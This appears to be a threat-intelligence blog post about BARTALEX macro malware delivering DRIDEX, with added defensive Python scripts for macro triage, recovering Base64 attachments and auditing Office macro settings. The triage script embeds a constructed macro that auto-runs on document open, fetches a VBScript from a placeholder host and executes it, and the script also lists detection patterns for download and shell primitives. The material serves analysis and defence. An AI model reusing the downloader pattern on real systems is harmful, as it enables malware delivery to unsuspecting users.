In 2015, we observed an increase in macro-based malware along with a spike in spam volume. BARTALEX macro malware, which arrived in spam emails carrying attachments such as Microsoft Word documents and Excel files, hit enterprises in April. We are currently monitoring another spam run laden with this macro malware that has affected certain countries in Europe.
Macro malware, as we have seen throughout the past year or so, is experiencing a revival of sorts. Thought to have been banished in the early 2000s, macro malware is proving to everyone that old threats die hard.
What are macros?
Macros are a set of commands or code meant to automate certain tasks inside a document or application. Recently, however, the bad guys have once again been using them heavily to automate their own malware-related tasks as well.
How do macro-related threats arrive?
We have observed that macro-based attacks often start with spammed messages. These messages typically use attention-grabbing topics, mostly related to finances. For this specific spam run that hit Europe, the messages were about remittance and invoice notifications.
What happens when the user opens the attachment?
For this spam run, we found two possible outcomes, depending on the attachment.
Users who open the attachment may see instructions about enabling macros. The default security settings in Microsoft Word disable macros precisely because they can be abused for malicious schemes, which is why the document has to talk the user into turning them on.
Enabling macros triggers the execution of a malicious macro embedded in the Word document. This macro connects to a specific URL to download a malicious VBScript, which in turn downloads the final payload.
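The downloader behaviour just described (an auto-run macro that fetches a script from a URL and executes it) is what an analyst looks for first when a suspicious document comes in. The following Python script is an added example, not code from the original post or from Trend Micro: it takes VBA source that has already been dumped from a document (extracting the compressed VBA project stream is assumed to be done with a separate tool), undoes the two cheapest obfuscations these macros use (Chr() character building and split string literals), and reports auto-execution entry points, download/write/execute primitives and URLs. The sample macro is constructed for the example and uses the reserved .invalid domain; it is not the BARTALEX code.

```python
"""Triage helper for VBA macro source dumped from an Office document.

Added example, not code from the original post or from Trend Micro. It assumes
the macro source has already been extracted to text (the VBA project stream is
compressed inside the document, so use a tool that reads it first). The sample
macro below is constructed for this example; it is not the BARTALEX code and
its URL uses the reserved .invalid TLD.
"""
import re

# Procedures Word/Excel run on their own once macros are enabled.
AUTO_EXEC = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose", "Document_Close",
             "Workbook_Open", "Auto_Open")

# What a first-stage downloader needs: fetch from a URL, write to disk, run the result.
PRIMITIVES = {
    "download": {
        "URLDownloadToFile": r"URLDownloadToFile",
        "MSXML2.XMLHTTP": r"MSXML2\.(Server)?XMLHTTP",
        "WinHttp.WinHttpRequest": r"WinHttp\.WinHttpRequest",
        "InternetExplorer.Application": r"InternetExplorer\.Application",
    },
    "write": {
        "ADODB.Stream": r"ADODB\.Stream",
        "Scripting.FileSystemObject": r"Scripting\.FileSystemObject",
        "Open ... For Binary": r"\bOpen\b.*\bFor\s+Binary\b",
        "SaveToFile": r"\bSaveToFile\b",
    },
    "execute": {
        "Shell": r"\bShell\b",
        "WScript.Shell": r"WScript\.Shell",
        "ShellExecute": r"ShellExecute",
        "wscript/cscript": r"\b[wc]script\b",
    },
}

URL_RE = re.compile(r"""https?://[^\s"'()<>]+""", re.IGNORECASE)
CHR_RE = re.compile(r"\bChr\$?\((\d+)\)", re.IGNORECASE)
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
CONTINUATION_RE = re.compile(r"\s_\r?\n")


def normalize(source: str) -> str:
    """Undo the two cheapest obfuscations used by downloader macros: building
    strings with Chr(n) and splitting literals with the & operator."""
    text = CONTINUATION_RE.sub(" ", source)  # join VBA line continuations

    def chr_to_literal(m):
        code = int(m.group(1))
        # keep printable ASCII only, and never synthesise a quote character
        return '"%s"' % chr(code) if 32 <= code < 127 and code != 34 else m.group(0)

    text = CHR_RE.sub(chr_to_literal, text)
    while True:  # each pass merges neighbouring literal pairs; repeat until stable
        merged = CONCAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), text)
        if merged == text:
            return text
        text = merged


def triage(source: str) -> dict:
    """Return the auto-exec entry points, downloader primitives and URLs found."""
    text = normalize(source)
    auto_exec = [name for name in AUTO_EXEC
                 if re.search(r"\bSub\s+%s\b" % re.escape(name), text, re.IGNORECASE)]
    primitives = {cat: [label for label, pat in pats.items()
                        if re.search(pat, text, re.IGNORECASE)]
                  for cat, pats in PRIMITIVES.items()}
    urls = sorted(set(URL_RE.findall(text)))
    if auto_exec and primitives["download"] and primitives["execute"]:
        verdict = "downloader"  # runs on open, fetches something, executes it
    elif urls or any(primitives.values()):
        verdict = "suspicious"
    else:
        verdict = "no downloader pattern"
    return {"auto_exec": auto_exec, "primitives": primitives, "urls": urls, "verdict": verdict}


# Constructed sample mimicking the pattern described above (not the real BARTALEX macro).
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String
    u = "ht" & "tp://" & Chr(101) & "xample.invalid/" & _
        "inv" & "oice.vbs"
    Dim h As Object
    Set h = CreateObject("MSXML2." & "XMLHTTP")
    h.Open "GET", u, False
    h.Send
    Dim s As Object
    Set s = CreateObject("ADODB.Stream")
    s.Type = 1
    s.Open
    s.Write h.responseBody
    s.SaveToFile Environ("TEMP") & "\upd.vbs", 2
    CreateObject("WScript." & "Shell").Run "wscript " & Environ("TEMP") & "\upd.vbs", 0
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = '''
Sub FormatReport()
    ActiveDocument.Range.Font.Name = "Arial"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, triage(src))
```

Real samples add more layers (string reversal, arithmetic on character codes, values hidden in document properties or form fields), so treat a "suspicious" verdict as a prompt to read the normalized source, not as a clean bill of health.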
The second outcome is different: some attachments, when opened, look like the one below.
In these cases, nothing malicious happens to the recipient's computer. This is an example of a Base64-encoded .DOC file sent as an email attachment: the attachment contains the Base64 text of the document rather than the document itself. There appears to have been a coding error while the attachment was being sent to its target recipients, resulting in this type of attachment. The malicious document can still be extracted from the text, but it takes considerable steps to do so.
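Recovering the document from such an attachment is mostly a matter of decoding the text correctly. The following Python helper is an added example, not from the original post: it decodes Base64 that may be line-wrapped, preceded by MIME header lines, sprinkled with whitespace, or missing its padding, and identifies the result by its file signature so the analyst knows whether an OLE2 .DOC (and therefore possibly a VBA project) came back. The sample attachment text is constructed from a fabricated OLE2 header, not a real attachment.

```python
"""Recover a .DOC that arrived as Base64 text rather than as a binary attachment.

Added example, not code from the original post. In the mis-sent attachments
described above the recipient sees the Base64 text of the document, so the
analyst has to decode it by hand before the macro can be examined. The sample
below is constructed: a 512-byte OLE2 header, not a real attachment.
"""
import base64
import binascii
import re

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# File-type signatures worth distinguishing once the bytes are back.
SIGNATURES = (
    (OLE2_MAGIC, "OLE2 compound file (.doc/.xls; VBA project may be inside)"),
    (b"PK\x03\x04", "OOXML zip (.docx/.docm; look for vbaProject.bin)"),
    (b"{\\rtf", "RTF (no VBA macros; check embedded objects instead)"),
    (b"MZ", "Windows executable disguised as a document"),
)

NOT_B64 = re.compile(r"[^A-Za-z0-9+/]")


def decode_attachment_text(text: str) -> bytes:
    """Decode Base64 that may be line-wrapped, preceded by MIME-style header
    lines, sprinkled with whitespace, or missing its '=' padding."""
    text = text.replace("\r\n", "\n")
    body = text
    if re.match(r"[A-Za-z-]+:", text) and "\n\n" in text:
        body = text.split("\n\n", 1)[1]  # skip the header block
    clean = NOT_B64.sub("", body)        # drops newlines, spaces and old padding
    clean += "=" * (-len(clean) % 4)     # recompute padding from the length
    try:
        return base64.b64decode(clean, validate=True)
    except binascii.Error as exc:
        raise ValueError("attachment text is not valid Base64") from exc


def identify(data: bytes) -> str:
    """Name the recovered file type from its leading bytes."""
    for magic, label in SIGNATURES:
        if data.startswith(magic):
            return label
    return "unknown"


def recover(text: str):
    """Return (file type label, decoded bytes) for a Base64 attachment body."""
    data = decode_attachment_text(text)
    return identify(data), data


# Constructed sample: OLE2 header (magic, zero CLSID, version/byte-order/sector
# size fields) padded to one 512-byte sector. Not a real document.
FAKE_DOC = OLE2_MAGIC + bytes(16) + b"\x3e\x00\x03\x00\xfe\xff\x09\x00" + bytes(512 - 32)

# What the mis-sent attachment looks like: header lines, then wrapped Base64.
SAMPLE_WITH_HEADERS = (
    'Content-Type: application/msword; name="remittance.doc"\n'
    "Content-Transfer-Encoding: base64\n\n"
    + base64.encodebytes(FAKE_DOC).decode()
)

# Same document with padding stripped and a space inserted every 4 characters.
_raw = base64.b64encode(FAKE_DOC).decode().rstrip("=")
SAMPLE_UNPADDED = " ".join(_raw[i:i + 4] for i in range(0, len(_raw), 4))

if __name__ == "__main__":
    label, data = recover(SAMPLE_WITH_HEADERS)
    print(label, len(data), "bytes")
```

Once the bytes are back, the document is handled like any other macro sample: the VBA project still has to be located and decompressed before the source can be triaged.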
What is the final payload?
For this spam run, DRIDEX variants are the final payload. DRIDEX is a malware family known for stealing personal information related to online banking by injecting HTML into banking pages as they are displayed in the browser. DRIDEX is considered the direct successor of the online banking malware CRIDEX; it features new malicious routines as well as techniques to avoid detection.
Once installed and executed on an affected system, DRIDEX variants are capable of the following routines:
Browser screenshot taking
DRIDEX is known to target financial institutions in Europe, which is consistent with this spam run affecting users in the European region.
What makes this threat noteworthy?
By themselves, macros are not harmful to the user. Their intended function is to automate frequently used tasks. The problem arises when cybercriminals abuse macro code to execute malicious routines.
This presents a problem for users who use macros regularly or even daily. Such users, once they receive a document with macro code, would not hesitate to enable the feature, or may even have the setting Enable all macros turned on, since it is common in some work environments to exchange files with macros.
Macro malware also poses a serious risk to users who have never heard of macros within the Microsoft Office suite. Unaware of the possible risks, and curious to open the file, these users may ignore the security warning and enable macros to view the document. After all, having already gone through several steps to open the file, and with the intriguing message of the accompanying email in mind, they may assume the file contains something of interest.
Aside from enticing messages, part of the social engineering tactic is the instruction to enable macros and the use of legitimate file formats, such as Microsoft Word and Excel documents, which enterprises rely on for their day-to-day operations. As such, employees may be tricked into thinking that the attachment is a legitimate file and end up running the macro malware.
Who are affected by this spam run?
Based on feedback from the Trend Micro Smart Protection Network, the EMEA region is the most affected, accounting for 92.5% of all affected computers.
In terms of affected countries, we have seen the most threat-related activity in France (84.2%), followed by Japan (2.6%) and Italy (2.2%).
We also found that the top three affected industries are government, healthcare, and education. Given that the social engineering lures were about remittances and invoices, employees in these industries may have opened the emails and attachments assuming they were work-related.
What’s the impact of this threat to enterprises?
Apart from malware infection and possible information theft, enterprise productivity is also affected by the high volume of spam runs carrying macro malware. They can disrupt business operations by distracting employees and IT departments, especially the Base64 samples, whose DOC attachments showed up as blocks of ASCII text.
Are Trend Micro users protected?
Addressing macro malware and its related threats requires multi-layered security solutions that can address each step of the attack. Powered by the Smart Protection Network, Trend Micro solutions can detect and block multiple components of this threat through file reputation, web reputation, and email reputation technologies.
What can users do to prevent these threats from affecting their computers?
As mentioned earlier, macros aren't inherently malicious. However, we recommend that users keep the macro security features of Microsoft Word enabled; they are on by default. Be wary of any document that instructs you to disable macro security or to enable macros: that instruction is part of the attack. It's far better to err on the side of caution than risk your device's security.
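For an administrator, "keep the macro security features enabled" translates into a registry check: Office stores the Trust Center macro setting as the VBAWarnings value under each application's Security key, and a value of 1 is the Enable all macros setting mentioned above. The following Python script is an added example, not from the original post: it reads a reg export of the Office keys (user settings and Group Policy settings), works out the effective setting per application and version, and flags machines where macros run without notification or where the Office 2016 and later BlockContentExecutionFromInternet policy is missing. The export text in the script is constructed for the example.

```python
"""Audit Office macro settings from a registry export.

Added example, not code from the original post. On the workstation export the
Office hives (reg export writes UTF-16 text):
    reg export HKCU\\Software\\Microsoft\\Office user.reg
    reg export HKCU\\Software\\Policies\\Microsoft\\Office policy.reg
and pass their text to parse_reg_export(). VBAWarnings is where Office stores
the Trust Center macro setting; BlockContentExecutionFromInternet is the
Office 2016+ policy that blocks macros in files marked as downloaded from the
Internet. The export below is constructed for the example.
"""
import re
import sys

VBAWARNINGS = {
    1: "Enable all macros",
    2: "Disable all macros with notification (Office default)",
    3: "Disable all macros except digitally signed macros",
    4: "Disable all macros without notification",
}

KEY_RE = re.compile(r"^\[HKEY_[^\]]*\\Office\\(\d+\.\d+)\\(Word|Excel|PowerPoint)\\Security\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})$')


def parse_reg_export(text: str) -> dict:
    """Map (scope, version, app) -> {value name: int} for the Security keys.
    scope is "policy" for keys under ...\\Policies\\..., otherwise "user"."""
    settings, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = None
            if m:
                scope = "policy" if "\\Policies\\" in line else "user"
                current = settings.setdefault((scope, m.group(1), m.group(2)), {})
        elif current is not None:
            v = VALUE_RE.match(line)
            if v:
                current[v.group(1)] = int(v.group(2), 16)
    return settings


def effective(settings, version, app, name, default):
    """A policy value overrides the user's Trust Center choice; neither -> default."""
    for scope in ("policy", "user"):
        vals = settings.get((scope, version, app), {})
        if name in vals:
            return vals[name], scope
    return default, "default"


def audit(settings) -> list:
    """Return (target, result, detail) tuples per Office application/version."""
    findings = []
    for version, app in sorted({(v, a) for (_, v, a) in settings}):
        target = f"{app} {version}"
        level, src = effective(settings, version, app, "VBAWarnings", 2)
        if level == 1:
            findings.append((target, "FAIL", f"all macros enabled ({src}); any document's macro runs silently"))
        elif level == 2:
            findings.append((target, "WARN", f"{VBAWARNINGS[2]} ({src}); one click on Enable Content runs the macro"))
        elif level in (3, 4):
            findings.append((target, "PASS", f"{VBAWARNINGS[level]} ({src})"))
        else:
            findings.append((target, "WARN", f"unrecognised VBAWarnings value {level} ({src})"))
        if float(version) >= 16.0:
            block, _ = effective(settings, version, app, "BlockContentExecutionFromInternet", 0)
            if block != 1:
                findings.append((target, "WARN", "BlockContentExecutionFromInternet is not 1; "
                                                 "macros in Internet-downloaded files are not blocked"))
    return findings


# Constructed export: Office 2013 (15.0) Word set to Enable all macros, Excel at
# the default, and Office 2016 (16.0) Word locked down by policy.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security]
"VBAWarnings"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security]
"VBAWarnings"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000004
"BlockContentExecutionFromInternet"=dword:00000001
"""

if __name__ == "__main__":
    # With no arguments the constructed export is audited; otherwise each .reg file given.
    text = SAMPLE_EXPORT
    if len(sys.argv) > 1:
        chunks = []
        for path in sys.argv[1:]:
            with open(path, encoding="utf-16") as fh:
                chunks.append(fh.read())
        text = "\n".join(chunks)
    for target, result, detail in audit(parse_reg_export(text)):
        print(f"{result:4} {target}: {detail}")
```

A WARN on the default setting is deliberate: "disable with notification" is exactly the state the social engineering described above is built to defeat, so environments that do not need unsigned macros should push 3 or 4 by policy rather than rely on the yellow bar.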
Since macro malware is often sent via email, good email security practices are a must. Double-check or verify each email, even those from known contacts, before opening it. Never open emails from unknown or unsolicited senders, even if the content seems important. Open attachments only if they can be verified.